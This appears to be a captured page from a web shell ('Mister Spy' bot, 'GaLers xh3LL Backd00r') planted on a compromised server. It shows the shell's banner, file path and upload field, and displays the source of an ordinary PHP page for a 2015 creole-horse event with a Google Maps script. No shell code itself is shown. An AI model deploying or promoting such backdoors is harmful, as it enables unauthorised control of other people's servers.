Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/public_html/ficcc_2015/espanol/
Upload File :
Current File : /home/caballoscriollos/public_html/ficcc_2015/espanol/sanidad.php

<?php 

$Titulo = 'FICCC 2015 | Sanidad';


?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
	<title><?=$Titulo?></title>
	<?php include("ssi_head_inc.php"); ?>
	<script type="text/javascript" src="http://maps.googleapis.com/maps/api/js?sensor=false"></script>
	<script>
		function initialize() {
			var mapOptions = {
				zoom: 14,
				center: new google.maps.LatLng(-34.578242,-58.420903),
				disableDefaultUI: true,
				mapTypeId: google.maps.MapTypeId.ROADMAP
			}
		  var map = new google.maps.Map(document.getElementById('map'),
										mapOptions);

			setMarkers(map, beaches);
		}
		var beaches = [
		  ['RURAL', -34.578242,-58.420903, 4]
		];

		function setMarkers(map, locations) {
		  var image = {
			url: 'images/banderita_mapa.png',
			size: new google.maps.Size(58, 66),
			origin: new google.maps.Point(0,0),
			anchor: new google.maps.Point(0, 32)
		  };
		  var shape = {
			  coord: [1, 1, 1, 20, 18, 20, 18 , 1],
			  type: 'poly'
		  };
		  for (var i = 0; i < locations.length; i++) {
			var beach = locations[i];
			var myLatLng = new google.maps.LatLng(beach[1], beach[2]);
			var marker = new google.maps.Marker({
				position: myLatLng,
				map: map,
				icon: image,
				shape: shape,
				title: beach[0],
				zIndex: beach[3]
			});
		  }
		}
		google.maps.event.addDomListener(window, 'load', initialize);
		
		function OpenNewWindow(url)
		{
			var newWindow = window.open(url, 'userConsole', 'width=1000,left=24,top=24,scrollbars,resizable');
			return false;
		}
	</script>	
</head>

<body class="fondo-gral">
	<div id="wrapper">
	
		<?php include("ssi_header.php"); ?>

		<div id="content" class="col-940 margen-top">

				
				<div class="content-info">
				
					<div class="titulo no-margen-top">Sanidad</div>

					<p>
					
					
					
					</p>
					
				</div>
			
		</div>	
		
		<div class="clear-fix">&nbsp;</div>
	</div>
		
	<?php include('ssi_contacto.php'); ?>
	<div id="map" class="mapa" style="width:100%; height:300px;"></div>			
	<?php include("ssi_footer.php"); ?>
	
</body>

</html>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat